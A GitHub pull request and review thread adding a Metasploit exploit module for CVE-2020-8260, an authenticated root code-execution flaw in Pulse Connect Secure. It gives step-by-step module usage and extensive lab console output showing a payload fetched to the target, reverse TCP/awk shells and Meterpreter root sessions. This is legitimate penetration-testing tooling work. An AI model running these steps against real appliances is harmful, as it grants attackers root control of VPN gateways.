### PR TITLE
Pulse Connect Secure gzip RCE: cve-2020-8260

### PR DESCRIPTION
**Pull request by h00die**
This PR adds a new exploit against Pulse Connect Secure servers <=9.1R8 found by NCC Group.  This is an authenticated RCE which uploads an encrypted config containing an overwrite for a perl template file allowing code execution as root.  Thanks to @rxwx for sharing the code for encryption.  Thanks to @wvu-r7 for helping with getting the code stable, Pulse Connect Secure is one heck of a fickle beast with lots of bad characters, missing binaries (they're in `/home/bin`, which isn't in `$PATH`).

Exploitation requires admin creds, and results in root access.  You can download the VM from https://www.pulsesecure.net/trynow/pulse-connect-secure/ however the page isn't loading correctly for me, so I'm unable to provide further details/links.

This exploit was tested against 9.1R8

## Verification

List the steps needed to make sure this thing works

- [ ] `use exploit/linux/http/pulse_secure_gzip_rce`
- [ ] `set rhosts [IP]`
- [ ] `set ssl true`
- [ ] `set username [username]`
- [ ] `set password [password]`
- [ ] `run`
- [ ] You should get a root shell
- [ ] **Document** looks good

I also added in the `cmd` option.  If you set it, it'll just run that `cmd` instead of a payload.  I used this for debugging, but thought it may be a good thing to leave in for edge cases.

### CODE REVIEW

**Comment by h00die** [comment]
Pushing back to draft since at some point I deleted `modules/exploits/linux/http/pulse_secure_cmd_exec.rb`, and need to restore it.

File: modules/exploits/linux/http/pulse_secure_cmd_exec.rb [hunk 1]
```diff
@@ -1,180 +0,0 @@
-##
```
Comment (wvu-r7) [inline modules/exploits/linux/http/pulse_secure_cmd_exec.rb:1]: Why did you delete this module?

Comment (h00die) [reply modules/exploits/linux/http/pulse_secure_cmd_exec.rb:1]: your guess is as good as mine.

Comment (wvu-r7) [reply modules/exploits/linux/http/pulse_secure_cmd_exec.rb:1]: Ah, hell, I just saw https://github.com/rapid7/metasploit-framework/pull/14368#issuecomment-723722461. Nevermind.

File: modules/exploits/linux/http/pulse_secure_gzip_rce.py [hunk 2]
```diff
@@ -61,6 +61,11 @@
         {'type': 'url', 'ref': 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601'},
         {'type': 'cve', 'ref': '2020-8260'}
     ],
+    'notes': {
+      'Stability': ['CRASH_SAFE'],
+      'SideEffects': ['ARTIFACTS_ON_DISK', 'CONFIG_CHANGES', 'IOS_IN_LOGS'],
```
Comment (wvu-r7) [inline modules/exploits/linux/http/pulse_secure_gzip_rce.py:66]: `IOS_IN_LOGS`?

Comment (h00die) [reply modules/exploits/linux/http/pulse_secure_gzip_rce.py:66]: as a side note there doesn't seem to be any checking/normalization/verification of these values, as is made obvious by this goof

**Comment by smcintyre-r7** [comment]
I submitted a reimplementation of this as a native Metasploit module in Ruby at h00die#16. It's a pretty close port of this Python version, I just changed the payload delivery mechanism a bit.

Let me know what you think. We're trying to limit the number of external modules where possible to provide users with a consistent experience without needing to install one-off libraries (in this case M2Crypto) for valuable exploits such as this.

**Comment by wvu-r7** [comment]
Nice work, @smcintyre-r7!

**Comment by h00die** [comment]
rewrite working well for me!

```
msf6 exploit(linux/http/pulse_secure_gzip_rce) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Other admin sessions detected, continuing
[*] Version 9.1, revision 8, build 7453 found
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/WYuViFHuu5pP5
[*] Local IP: http://1.1.1.1:8080/WYuViFHuu5pP5
[*] Exploit trigger will be at /dana-na/auth/setcookie.cgi with a header of APPCCUVA
[*] Requesting backup config page
[*] Uploading encrypted config backup
[*] Triggering RCE
[*] Client 2.2.2.2 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3) requested /WYuViFHuu5pP5
[*] Sending payload to 2.2.2.2 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3)
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:44849) at 2020-12-17 17:06:58 -0500
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Logging out to prevent warnings to other admins
[*] Server stopped.

meterpreter > getuid
Server username: root @ localhost2 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           :  (Linux 2.6.32-00025-g841d072-dirty)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

**Review by smcintyre-r7 — APPROVED** [review]

**Review by wvu — APPROVED** [review]

**Comment by smcintyre-r7** [comment]
Just ran one more test of both targets and everything looks good, so I'll get this merged in now. Thanks alot @h00die !

<details>
<summary>Testing Output</summary>

```
msf6 exploit(linux/http/pulse_secure_gzip_rce) > show options 

Module options (exploit/linux/http/pulse_secure_gzip_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   Password1!       yes       The password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.100  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of the application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       The username to login with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/pulse_secure_gzip_rce) > check

[*] Version 9.1, revision 8, build 7453 found
[*] Logging out to prevent warnings to other admins
[*] 192.168.159.100:443 - The target appears to be vulnerable.
msf6 exploit(linux/http/pulse_secure_gzip_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Version 9.1, revision 8, build 7453 found
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/MhxXW0kR2ZPs
[*] Local IP: http://192.168.250.87:8080/MhxXW0kR2ZPs
[*] Exploit trigger will be at /dana-na/auth/setcookie.cgi with a header of TKTTZTCE
[*] Requesting backup config page
[*] Uploading encrypted config backup
[*] Triggering RCE
[*] Client 192.168.159.100 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3) requested /MhxXW0kR2ZPs
[*] Sending payload to 192.168.159.100 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3)
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.100:18354) at 2020-12-17 17:40:55 -0500
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Logging out to prevent warnings to other admins
[*] Server stopped.

meterpreter > getuid
Server username: root @ localhost2 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo 
Computer     : 192.168.159.100
OS           :  (Linux 2.6.32-00025-g841d072-dirty)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background 
[*] Backgrounding session 2...
msf6 exploit(linux/http/pulse_secure_gzip_rce) > 
msf6 exploit(linux/http/pulse_secure_gzip_rce) > set TARGET Unix\ In-Memory 
TARGET => Unix In-Memory
msf6 exploit(linux/http/pulse_secure_gzip_rce) > set PAYLOAD cmd/unix/reverse_awk 
PAYLOAD => cmd/unix/reverse_awk
msf6 exploit(linux/http/pulse_secure_gzip_rce) > show options 

Module options (exploit/linux/http/pulse_secure_gzip_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   Password1!       yes       The password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.100  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of the application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       The username to login with
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_awk):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix In-Memory


msf6 exploit(linux/http/pulse_secure_gzip_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Version 9.1, revision 8, build 7453 found
[+] The target appears to be vulnerable.
[*] Exploit trigger will be at /dana-na/auth/setcookie.cgi with a header of XDAPXAYN
[*] Requesting backup config page
[*] Uploading encrypted config backup
[*] Triggering RCE
[*] Command shell session 3 opened (192.168.159.128:4444 -> 192.168.159.100:22332) at 2020-12-17 17:41:48 -0500
id
[*] Logging out to prevent warnings to other admins

id
pwd
/home/webserver/htdocs/dana-na/auth
```
</details>

**Comment by h00die** [comment]
thanks for all your help with converting it from python!

**Comment by smcintyre-r7** [comment]
# Release Notes
This adds an exploit for an authenticated vulnerability within the Pulse Connect Secure appliance identified as CVE-2020-8260. The vulnerability is related to the mishandling of a compressed file that when uploaded to the server allows a CGI script to be modified which leads to code execution as root.

**Pull request merged**